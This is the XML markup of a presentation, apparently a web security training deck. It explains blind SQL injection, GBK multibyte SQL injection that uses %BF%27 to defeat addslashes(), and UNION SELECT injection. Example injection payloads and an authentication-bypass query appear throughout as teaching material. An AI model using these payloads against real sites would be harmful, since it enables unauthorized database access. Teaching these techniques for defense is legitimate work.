              <a:gd name="adj2" fmla="val 134090"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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9200" y="1374260"/>
            <a:ext cx="7696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rPr>
              <a:t>Even if error messages are disabled, an attacker can still do “Blind” SQL Injection!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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12/31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33576" y="3756334"/>
            <a:ext cx="47532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Try this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>http://books.com/item.php?id=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and 1=2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33576" y="4702314"/>
            <a:ext cx="47532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Then try this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>http://books.com/item.php?id=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and 1=1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88681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Advance SQL Injection 1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189" y="2743200"/>
            <a:ext cx="3677318" cy="3677318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914401" y="1243650"/>
            <a:ext cx="7572820" cy="1499550"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2889"/>
              <a:gd name="adj2" fmla="val 180685"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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2021" y="1455763"/>
            <a:ext cx="731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rPr>
              <a:t>Here is one problem in the history: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" u="sng" dirty="0" err="1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rPr>
              <a:t>Multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" u="sng" dirty="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rPr>
              <a:t> SQL Injection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13/31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96058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err="1"/>
              <a:t>Multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> Character sets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1447800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GBK: Simplified Chinese</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Big5: Traditional Chinese</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Shift_JIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>: Japanese</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>UTF-8: Covers most major languages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14/31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6967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For Example: GBK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2500" y="2057400"/>
            <a:ext cx="72390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dirty="0"/>
              <a:t>%BF%5C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15/31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1934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Target Audiences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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Targeted audiences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="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rPr>
              <a:t>Developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Those interested in web security Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Those looking for a sense of hacking</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Expected skillset (Important)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Basic knowledge of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="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rPr>
              <a:t>HTML</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1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rPr>
              <a:t>Javascript</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="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rPr>
              <a:t>SQL</a:t>
            </a:r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 query, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="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rPr>
              <a:t>SSH</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r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 commands (ex: ls, tail, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr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  <a:p>
            <a:pPr lvl="1"/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4229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For Example: GBK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2500" y="2057400"/>
            <a:ext cx="72390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dirty="0"/>
              <a:t>%BF%5C</a:t>
            </a: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2209799" y="4495799"/>
            <a:ext cx="2610581" cy="1978799"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15503"/>
              <a:gd name="adj2" fmla="val -81350"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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0580" y="4489703"/>
            <a:ext cx="220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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>縗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72957" y="5826384"/>
            <a:ext cx="4171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Ref: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>charset.uic.jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/show/gb2312/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16/31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143000" y="3810000"/>
            <a:ext cx="6781800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6143430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2500" y="828520"/>
            <a:ext cx="72390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0" u="sng" dirty="0"/>
              <a:t>%BF%27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For Example: GBK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976884" y="3777032"/>
            <a:ext cx="2593975" cy="1018259"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 77531"/>
              <a:gd name="adj2" fmla="val -140977"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No such word!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But…</a:t>
            </a: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17/31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951540"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5122917" y="3505200"/>
          <a:ext cx="3259083" cy="1886580"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1612828">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2098141573"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1646255">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1308055260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="353899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Character</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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From UTF-8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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36767401"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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9209495"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%27</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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7426811"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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50791919"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%29</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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51183787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618636"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5122916" y="5394922"/>
          <a:ext cx="3259083" cy="377316"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1612828">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486438876"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1646255">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1271667454"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%5C</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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27134226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 bwMode="auto">
          <a:xfrm>
            <a:off x="4999857" y="4191001"/>
            <a:ext cx="3505199" cy="457200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029201" y="5334000"/>
            <a:ext cx="3505199" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent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4472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Multibyte parsing in PHP &amp; MySQL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12192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 PHP you can sanitize with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>mysql_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Adding backslashes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" u="sng" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>reserved characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>single quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000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18/31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5181600"/>
            <a:ext cx="7755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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where ’ to become \’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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565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Sanitization with PHP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90601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1157" y="869965"/>
            <a:ext cx="5962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%BF%27</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Down Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3797009" y="2575539"/>
            <a:ext cx="1447800" cy="1478340"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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80377" y="1996012"/>
            <a:ext cx="16573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Single Quote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7404" y="2690080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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addslahes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byte by byte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1974" y="4141779"/>
            <a:ext cx="80486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%BF%5C%27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19/31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762000" y="2286000"/>
            <a:ext cx="2438400" cy="0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none" w="med" len="med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429000" y="2286000"/>
            <a:ext cx="2286000" cy="0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none" w="med" len="med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354273" y="5480981"/>
            <a:ext cx="2524812" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4610100" y="5888049"/>
            <a:ext cx="2589327" cy="761013"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52675"/>
              <a:gd name="adj2" fmla="val -94985"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backslash added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102669"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5732994" y="1970539"/>
          <a:ext cx="3259083" cy="1886580"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1612828">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2098141573"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1646255">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1308055260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="353899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Character</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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From UTF-8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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36767401"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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99209495"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%27</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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7426811"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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50791919"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%29</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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51183787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093171"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5732993" y="3860261"/>
          <a:ext cx="3259083" cy="377316"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1612828">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486438876"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1646255">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1271667454"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="373735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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="133477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1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%5C</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66738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2713422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044062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61873" y="3600025"/>
            <a:ext cx="80486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%BF%5C%27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Parsing by MySQL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6741" y="978932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3767860" y="2239442"/>
            <a:ext cx="1447800" cy="1478340"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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6594436" y="2171550"/>
            <a:ext cx="2383200" cy="717908"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90223"/>
              <a:gd name="adj2" fmla="val -50255"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Added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by PHP side</a:t>
            </a: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2645930" y="5510690"/>
            <a:ext cx="1447800" cy="726041"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6808"/>
              <a:gd name="adj2" fmla="val -117638"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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lang="en-US" altLang="ja-JP" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>縗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="28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19/31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838200" y="4951960"/>
            <a:ext cx="5149596" cy="0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none" w="med" len="med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128004" y="4951960"/>
            <a:ext cx="2324312" cy="0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none" w="med" len="med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ular Callout 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6128004" y="5510551"/>
            <a:ext cx="1263396" cy="681407"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30961"/>
              <a:gd name="adj2" fmla="val -116056"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="44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14620" y="2560837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</a:rPr>
              <a:t>When parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in MySQL…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9030" y="731080"/>
            <a:ext cx="80486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%BF%5C%27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3571329" y="2070282"/>
            <a:ext cx="2524812" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med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403555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Multibyte SQL Injection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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>縗’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r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5334000" y="2362200"/>
            <a:ext cx="3373800" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66879"/>
              <a:gd name="adj2" fmla="val 126136"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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Now we have the 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</a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil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single quote again!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20/31</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="http://boomag.ch/wp-content/uploads/2015/11/Boomlogo_trans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7172" y="3398977"/>
            <a:ext cx="2667000" cy="188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98413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JFYI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0" y="2743200"/>
            <a:ext cx="7392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This has been fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> in MySQL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 4.1.20, 5.0.22, 5.1.11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21/31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37966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Advance SQL Injection 2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424" y="2704607"/>
            <a:ext cx="3677318" cy="3677318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2514601" y="1184972"/>
            <a:ext cx="5945188" cy="1645760"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33892"/>
              <a:gd name="adj2" fmla="val 163181"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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45729" y="1469243"/>
            <a:ext cx="5829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rPr>
              <a:t>Now let’s take a look at </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="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rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" u="sng" dirty="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rPr>
              <a:t>UNION SELECT SQL Injection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22/31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05772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UNION SELECT SQL Injection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369" y="811168"/>
            <a:ext cx="6905261" cy="251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23/31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9975" y="3567683"/>
            <a:ext cx="6905261" cy="254572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286000" y="1143000"/>
            <a:ext cx="3200400" cy="0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301240" y="3922776"/>
